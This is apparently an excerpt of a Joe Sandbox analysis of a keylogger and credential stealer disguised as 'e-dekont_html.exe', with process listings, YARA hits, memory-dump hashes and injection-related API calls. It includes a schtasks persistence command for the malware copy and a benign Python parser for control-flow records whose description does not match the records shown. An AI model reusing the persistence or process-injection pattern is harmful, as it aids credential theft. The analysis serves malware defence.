                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:5
                                                                                                                                                        Start time:01:52:08
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:6
                                                                                                                                                        Start time:01:52:08
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp"
                                                                                                                                                        Imagebase:0x430000
                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:7
                                                                                                                                                        Start time:01:52:08
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:8
                                                                                                                                                        Start time:01:52:08
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\e-dekont_html.exe"
                                                                                                                                                        Imagebase:0xa00000
                                                                                                                                                        File size:709'120 bytes
                                                                                                                                                        MD5 hash:3C1D34A25A8B8A96896E746F13C346BF
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4161363308.0000000002E99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:9
                                                                                                                                                        Start time:01:52:10
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        Imagebase:0x8e0000
                                                                                                                                                        File size:709'120 bytes
                                                                                                                                                        MD5 hash:3C1D34A25A8B8A96896E746F13C346BF
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        • Detection: 63%, ReversingLabs
• Detection: 67%, Virustotal
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:10
                                                                                                                                                        Start time:01:52:12
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                        Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:0x7ff693ab0000
File size:496'640 bytes
MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:01:52:14
Start date:20/11/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp8A49.tmp"
Imagebase:0x430000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:01:52:14
Start date:20/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:01:52:15
Start date:20/11/2024
Path:C:\Users\user\AppData\Roaming\fahKSvwo.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\fahKSvwo.exe"
Imagebase:0xdd0000
File size:709'120 bytes
MD5 hash:3C1D34A25A8B8A96896E746F13C346BF
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4158045385.000000000043D000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:false


Execution Graph

Execution Coverage:11.5%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:0%
Total number of Nodes:184
Total number of Limit Nodes:11
Strings
Memory Dump Source
• Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID: (ofq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4|kq$4|kq$$fq
• API String ID: 0-2750812312
• Opcode ID: b63659728bc559bfb70ac1dc6e5c8ce9a99a79e2c7f1584df11f5600205bb87d
• Instruction ID: 634f3cc4f07f0ad9594822cdbfb34e119d7e67a4fc1b4d0674512205b4309a72
• Opcode Fuzzy Hash: b63659728bc559bfb70ac1dc6e5c8ce9a99a79e2c7f1584df11f5600205bb87d
• Instruction Fuzzy Hash: F0631974A00219CFCB25DF6CC888A9DBBB2BF89311F158599D459AB3A1DB30ED81DF50

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID: 4'fq$:$pjq$~
• API String ID: 0-2740937384
• Opcode ID: 3551dcffff4785e4452eee1e2b44396ad83489c32be04c3931692e4c649694d6
• Instruction ID: 372609cdbf40ff15b8a5ef6df8ece25c702dd45b0d9e7a80ec047aa998858862
• Opcode Fuzzy Hash: 3551dcffff4785e4452eee1e2b44396ad83489c32be04c3931692e4c649694d6
• Instruction Fuzzy Hash: 6A42A079A04228DFDB15CFA9C984B99BBB2FF48304F1580E9E509AB361D7319D91DF10
Memory Dump Source
• Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 191e39dc6d8c811fd2c048021a63ddfd43670fdd07ad2fc102fd2309826a26cd
• Instruction ID: 410c45f6c946ca92c8dfb17e732fbdefd9eb22095b9e70eaafe9c02fdb1dfd6b
• Opcode Fuzzy Hash: 191e39dc6d8c811fd2c048021a63ddfd43670fdd07ad2fc102fd2309826a26cd
• Instruction Fuzzy Hash: BFE1CAB1B012059FDB29DB79C490BEEB7FAAF8A740F1444ADD1469B390DB31E881CB51
Memory Dump Source
• Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5ec0d558768920c0ec60961031f26aa01e5a61252f278c378470a2fb60f256ea
• Instruction ID: 5fdf68647fd95b7f7fc4479e0682e3ee94e9522dd516e1160f3a50f9647fc3fe
• Opcode Fuzzy Hash: 5ec0d558768920c0ec60961031f26aa01e5a61252f278c378470a2fb60f256ea
• Instruction Fuzzy Hash: 5FE012F8D5E288CFC7229E6458945F57BBDA74B204F0930EA808BA7253D52545D38B19

Control-flow Graph
APIs
• GetCurrentProcess.KERNEL32 ref: 012BD07E
• GetCurrentThread.KERNEL32 ref: 012BD0BB
• GetCurrentProcess.KERNEL32 ref: 012BD0F8
• GetCurrentThreadId.KERNEL32 ref: 012BD151
Memory Dump Source
• Source File: 00000000.00000002.1768343651.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_12b0000_e-dekont_html.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 9a0e5e333b8f302599cbe61600b93ba4ccbb783e9aac4b1402e272ca03842668
                                                                                                                                                          • Instruction ID: 4a6ff544426e2bffbd7c2c43c14b300b7ae0512a3207bd4bcffd14907e7b170a
                                                                                                                                                          • Opcode Fuzzy Hash: 9a0e5e333b8f302599cbe61600b93ba4ccbb783e9aac4b1402e272ca03842668
                                                                                                                                                          • Instruction Fuzzy Hash: 685175B09002498FDB18CFA9C988BEEBFF1EF88314F248559E419A73A0CB345944CF65

Control-flow Graph
• Basic blocks 12bd000-12bd1cd (graph rendering omitted; nodes were marked executed / not executed)
APIs
• GetCurrentProcess.KERNEL32 ref: 012BD07E
• GetCurrentThread.KERNEL32 ref: 012BD0BB
• GetCurrentProcess.KERNEL32 ref: 012BD0F8
• GetCurrentThreadId.KERNEL32 ref: 012BD151
Memory Dump Source
• Source File: 00000000.00000002.1768343651.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_12b0000_e-dekont_html.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 89f9e6d95d30be5d2d118ef34179200b98c9d0793769682997a5a8e9c2a63b46
• Instruction ID: c5dad34e1b23bc90b577e6f598db69383aedf439e3a8272b368ddd52f3305789
• Opcode Fuzzy Hash: 89f9e6d95d30be5d2d118ef34179200b98c9d0793769682997a5a8e9c2a63b46
• Instruction Fuzzy Hash: 075165B09102498FDB18CFA9C988BDEBFF1EF48314F208559E419A73A0DB345944CB65

Control-flow Graph
• Basic blocks 76b13c4-76b1715 (graph rendering omitted; nodes were marked executed / not executed)
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076B1606
Memory Dump Source
• Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: b68ed53aa28d4e52dd823b77239613e1549c9e9280990385ae643de2543bb3b4
• Instruction ID: 6f6beb5c8cc5fc1119dbeaee21c46efe58d136968ce10f729643d29d5099e52f
• Opcode Fuzzy Hash: b68ed53aa28d4e52dd823b77239613e1549c9e9280990385ae643de2543bb3b4
• Instruction Fuzzy Hash: E4A14DB1D0021EDFDF24CFA8C9917EDBBB2AF4A310F148169E819A7250E7749985CF91

Control-flow Graph
• Basic blocks 76b13d0-76b1715 (graph rendering omitted; nodes were marked executed / not executed)
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076B1606
Memory Dump Source
• Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 4cea5b714a050136dde46c71af4e5a2cde0ed9d19f2c46127846e97dec03d7e9
• Instruction ID: 287dd8ab9bff4addc0c40dba2e9618c2b92e4c818a421e37237f6058e74ea20d
• Opcode Fuzzy Hash: 4cea5b714a050136dde46c71af4e5a2cde0ed9d19f2c46127846e97dec03d7e9
• Instruction Fuzzy Hash: 74914CB1D0021EDFDF24CF68C9517EDBBB2AF4A310F148169D819A7250E7749985CF91

Control-flow Graph
• Basic blocks 8f0f8b0-8f0fde6 (graph rendering omitted; nodes were marked executed / not executed)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID: 4'fq
• API String ID: 0-2007657732
• Opcode ID: aecf80df307d97b19e1833c2d11166bb2efcd97f8e3002de8acbe3df55a4d6de
• Instruction ID: 39aaa2f64ed210055392baa58b42f564866312d6273bc09b295e17939e6bce5a
• Opcode Fuzzy Hash: aecf80df307d97b19e1833c2d11166bb2efcd97f8e3002de8acbe3df55a4d6de
• Instruction Fuzzy Hash: 80E13B74E00219DFCB05EBF8D994AAEBBB2EB88300F148059E505A7394DF35AD81EF51

Control-flow Graph
• Basic blocks 12b5a84-12b5b2b (graph rendering omitted; nodes were marked executed / not executed)
Memory Dump Source
• Source File: 00000000.00000002.1768343651.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_12b0000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 04d13fb013c32dca2ea983e03f39f52d6478b0f4d36d84f507aa18647e44426c
• Instruction ID: 4ff3eb98f236123a8671e1ec0d184c17860915e2dd8f0a503f4ff93a1043fe63
• Opcode Fuzzy Hash: 04d13fb013c32dca2ea983e03f39f52d6478b0f4d36d84f507aa18647e44426c
• Instruction Fuzzy Hash: 7E41BFB1814749CFDF21CFA8C8856EEBBB0EF56364F14418AC545AF252C775A94ACF80

Control-flow Graph
• Basic blocks 12b44b4-12b5a61 (graph rendering omitted; nodes were marked executed / not executed)
APIs
• CreateActCtxA.KERNEL32(?), ref: 012B59C9
Memory Dump Source
• Source File: 00000000.00000002.1768343651.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_12b0000_e-dekont_html.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 042c802834d697f80659eca01b58e98dc385734a271aae0daa8b1cb3b91aaa02
• Instruction ID: 98e1085890e37bc4dcc196ff2363c1de9349ddafe8c0d045468dcaaf8dda4f8f
• Opcode Fuzzy Hash: 042c802834d697f80659eca01b58e98dc385734a271aae0daa8b1cb3b91aaa02
• Instruction Fuzzy Hash: BF41DEB0C10719CBDB24DFAAC984BCEBBF5BF49304F20806AD509AB251DB756946CF90

Control-flow Graph
• Basic blocks 12b590c-12b5a61 (graph rendering omitted; nodes were marked executed / not executed)
APIs
• CreateActCtxA.KERNEL32(?), ref: 012B59C9
Memory Dump Source
• Source File: 00000000.00000002.1768343651.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_12b0000_e-dekont_html.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 013c506a91e1a78b58237e0c4d447809af1d383547b4a6d036977e70f939cd07
• Instruction ID: d543610ca5e63b9c6ccb477193d4c22364400a21f42272ece1842a3f8beda369
• Opcode Fuzzy Hash: 013c506a91e1a78b58237e0c4d447809af1d383547b4a6d036977e70f939cd07
• Instruction Fuzzy Hash: B741DEB0C00719CBDB25DFAAC984BCEBBF5BF49304F24806AD408AB251DB756946CF90

Control-flow Graph

Control-flow graph (node: address range, API called in that block; then edges):
  1661: 76b1141-76b1196
  1664: 76b1198-76b11a4
  1665: 76b11a6-76b11e5  WriteProcessMemory
  1667: 76b11ee-76b121e
  1668: 76b11e7-76b11ed
  Edges: 1661->1664, 1661->1665, 1664->1665, 1665->1667, 1665->1668, 1668->1667
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076B11D8
Memory Dump Source
• Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 071e5d6a751883cbf0571f7dfcfeda4705ea00cdaaacbc892769c7f753969397
• Instruction ID: 74ca06d90274606d6865b9c93723811e945eb81a41fe2995ec779dece1f801de
• Opcode Fuzzy Hash: 071e5d6a751883cbf0571f7dfcfeda4705ea00cdaaacbc892769c7f753969397
• Instruction Fuzzy Hash: 7E2139B590034ADFDB14CFA9C981BDEBBF5FF48320F10842AE519A7240C778A544DB60

Control-flow Graph

Control-flow graph (node: address range, API called in that block; then edges):
  1672: 76b0b70-76b0bc3
  1675: 76b0bd3-76b0c03  Wow64SetThreadContext
  1676: 76b0bc5-76b0bd1
  1678: 76b0c0c-76b0c3c
  1679: 76b0c05-76b0c0b
  Edges: 1672->1675, 1672->1676, 1675->1678, 1675->1679, 1676->1675, 1679->1678
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076B0BF6
Memory Dump Source
• Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: c022c76d6c0289b3eb7159fc2e879f794aac439e0cb64f1560787b19baf9465d
• Instruction ID: 7e88107d0dd2af7c44611da1beca21bde2ac4c25c25496fbccf83cd78285858e
• Opcode Fuzzy Hash: c022c76d6c0289b3eb7159fc2e879f794aac439e0cb64f1560787b19baf9465d
• Instruction Fuzzy Hash: A82148B59002098FDB20DFAAC485BEEFFF4AF49324F14842AD419A7341C7789545CFA1

Control-flow Graph

Control-flow graph (node: address range, API called in that block; then edges):
  1683: 76b1148-76b1196
  1685: 76b1198-76b11a4
  1686: 76b11a6-76b11e5  WriteProcessMemory
  1688: 76b11ee-76b121e
  1689: 76b11e7-76b11ed
  Edges: 1683->1685, 1683->1686, 1685->1686, 1686->1688, 1686->1689, 1689->1688
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076B11D8
Memory Dump Source
• Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: c704bcb53c88d3918cefd060293cbc770ebb1360c5840ab4b0bd4ba5224a4b43
• Instruction ID: 3e5da9c00b03115cfd0bcb3e070c1aa45f63aed430dc1b2f1b501edbde5eac3b
• Opcode Fuzzy Hash: c704bcb53c88d3918cefd060293cbc770ebb1360c5840ab4b0bd4ba5224a4b43
• Instruction Fuzzy Hash: 082128B19003499FDB14CFA9C981BDEBBF5FF88320F108429E919A7340C7789544DB60

Control-flow Graph

Control-flow graph (node: address range, API called in that block; then edges):
  1693: 76b1230-76b12c5  ReadProcessMemory
  1697: 76b12ce-76b12fe
  1698: 76b12c7-76b12cd
  Edges: 1693->1697, 1693->1698, 1698->1697
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076B12B8
Memory Dump Source
• Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 4cba0d7c4c970f71baf70a00a09d83769fcfb5ea16760c28ecb0455d8d626c39
• Instruction ID: 75f654a5b88ba0d4af644967e231a3675b96d0a1414d17900f3c49f1b25cff61
• Opcode Fuzzy Hash: 4cba0d7c4c970f71baf70a00a09d83769fcfb5ea16760c28ecb0455d8d626c39
• Instruction Fuzzy Hash: CC2125B19002499FDB10CFAAC881AEEFBF5FF48320F10842AE519A7240C778A541DBA1
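The control_flow_graph records above are the Joe Sandbox IDA plugin's serialized form of each function's graph: a node id followed by a hex address range (a single address for a one-byte block), API names attached to the block declared just before them, and from->to edges between node ids. The following is an added example, not part of the report or of the plugin, that parses that string into blocks and edges so the five graphs on this page can be queried: which block calls the API, which blocks are reachable from the entry block, and where the self-loop at 12b5a61 sits. The record layout is inferred from the entries on this page; the class and function names are mine, and the two sample strings are copied from the CreateActCtxA and ReadProcessMemory entries.

```python
"""Parse the serialized control-flow graphs emitted by the Joe Sandbox IDA plugin.

Token grammar as observed on this page (layout inferred, not documented by the plugin):
  control_flow_graph            record header
  <node-id> <start>[-<end>]     a basic block; hex addresses, one address for a one-byte block
  <ApiName>                     an API call, attributed to the block declared just before it
  <from>-><to>                  a directed edge between node ids
"""
import re
from dataclasses import dataclass, field

# Copied from the CreateActCtxA entry above (module region 012B0000).
SAMPLE_CREATEACTCTX = (
    "control_flow_graph 1644 12b590c-12b598c 1645 12b598f-12b59d9 CreateActCtxA "
    "1644->1645 1647 12b59db-12b59e1 1645->1647 1648 12b59e2-12b5a3c 1645->1648 "
    "1647->1648 1655 12b5a4b-12b5a4f 1648->1655 1656 12b5a3e-12b5a41 1648->1656 "
    "1657 12b5a51-12b5a5d 1655->1657 1658 12b5a60 1655->1658 1656->1655 "
    "1657->1658 1660 12b5a61 1658->1660 1660->1660"
)
# Copied from the ReadProcessMemory entry above (module region 076B0000).
SAMPLE_READPROCESSMEMORY = (
    "control_flow_graph 1693 76b1230-76b12c5 ReadProcessMemory 1697 76b12ce-76b12fe "
    "1693->1697 1698 76b12c7-76b12cd 1693->1698 1698->1697"
)

EDGE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID = re.compile(r"^\d+$")
ADDR_RANGE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")


@dataclass
class Block:
    node: int
    start: int
    end: int
    apis: list = field(default_factory=list)


@dataclass
class Cfg:
    entry: int                                   # first block declared in the record
    blocks: dict = field(default_factory=dict)   # node id -> Block
    edges: list = field(default_factory=list)    # (from, to) node ids

    def successors(self, node):
        return sorted(b for a, b in self.edges if a == node)

    def self_loops(self):
        """Blocks whose only way forward is themselves (1660 -> 1660 in the first graph)."""
        return sorted(a for a, b in self.edges if a == b)

    def api_blocks(self):
        """API name -> node id of the block that calls it."""
        return {api: blk.node for blk in self.blocks.values() for api in blk.apis}

    def reachable(self):
        """Node ids reachable from the entry; anything missing is dead code or a parse problem."""
        seen, todo = set(), [self.entry]
        while todo:
            n = todo.pop()
            if n in seen:
                continue
            seen.add(n)
            todo.extend(self.successors(n))
        return seen


def parse_cfg(text):
    tokens = text.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph record")
    cfg, last, i = None, None, 1
    while i < len(tokens):
        tok = tokens[i]
        if (m := EDGE.match(tok)):
            if cfg is None:
                raise ValueError("edge before any block")
            cfg.edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and (r := ADDR_RANGE.match(tokens[i + 1])):
            start = int(r.group(1), 16)
            end = int(r.group(2), 16) if r.group(2) else start   # single-address block
            last = Block(int(tok), start, end)
            if cfg is None:
                cfg = Cfg(entry=last.node)
            cfg.blocks[last.node] = last
            i += 2
        else:
            if last is None:
                raise ValueError(f"API name {tok!r} before any block")
            last.apis.append(tok)      # e.g. CreateActCtxA, attributed to the preceding block
            i += 1
    if cfg is None:
        raise ValueError("record declares no blocks")
    return cfg


if __name__ == "__main__":
    for sample in (SAMPLE_CREATEACTCTX, SAMPLE_READPROCESSMEMORY):
        g = parse_cfg(sample)
        print(f"entry={g.entry} blocks={len(g.blocks)} edges={len(g.edges)} "
              f"apis={g.api_blocks()} self_loops={g.self_loops()} "
              f"unreachable={sorted(set(g.blocks) - g.reachable())}")
```

The API-to-block mapping is what makes the hashes above comparable across dumps: the two WriteProcessMemory graphs (nodes 1661-1668 and 1683-1689) have identical shape and address ranges apart from a 7-byte shift of the entry block, which is why their Instruction Fuzzy Hashes differ only in a few positions.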
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012BD6D7
Memory Dump Source
• Source File: 00000000.00000002.1768343651.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_12b0000_e-dekont_html.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: f77cb8c851df8cef6836f3e31be1feb8718e78cd08764788fbc4c65a92074455
• Instruction ID: 787a4eec6496f36d60da5ed1435299598ac9fafaaa2c7e11269b295fb250830e
• Opcode Fuzzy Hash: f77cb8c851df8cef6836f3e31be1feb8718e78cd08764788fbc4c65a92074455
• Instruction Fuzzy Hash: 1321E4B5D002499FDB10CFAAE585AEEFFF5EB58324F14801AE918A7350C378A944CF60
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076B0BF6
Memory Dump Source
• Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 2477e35d1cdc8e6e6d1cdbaef39fb9331c6b320587c0ff0ba30a6e4141f0b861
• Instruction ID: 880ac70d36436bcb183b5b391dc8d5d8ba6a06acc2fe6fb35e4b444185671f29
• Opcode Fuzzy Hash: 2477e35d1cdc8e6e6d1cdbaef39fb9331c6b320587c0ff0ba30a6e4141f0b861
• Instruction Fuzzy Hash: 402107B19002098FDB20DFAAC5857EEBFF4AF49324F14842AD519A7341D778A945CFA1
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076B12B8
Memory Dump Source
• Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: bb0897f882e34a3e05fd0907178d3769fb74c5bae003f1501191ba20ff68f078
• Instruction ID: 9218412d1c3b46ab9dcd47cdeb82734e63e6a2e873979d0d6042f75b0b15eaec
• Opcode Fuzzy Hash: bb0897f882e34a3e05fd0907178d3769fb74c5bae003f1501191ba20ff68f078
• Instruction Fuzzy Hash: 332128B19003499FDB10DFAAC881ADEFBF5FF48320F10842AE519A7240C7789540DBA1
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012BD6D7
Memory Dump Source
• Source File: 00000000.00000002.1768343651.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_12b0000_e-dekont_html.jbxd
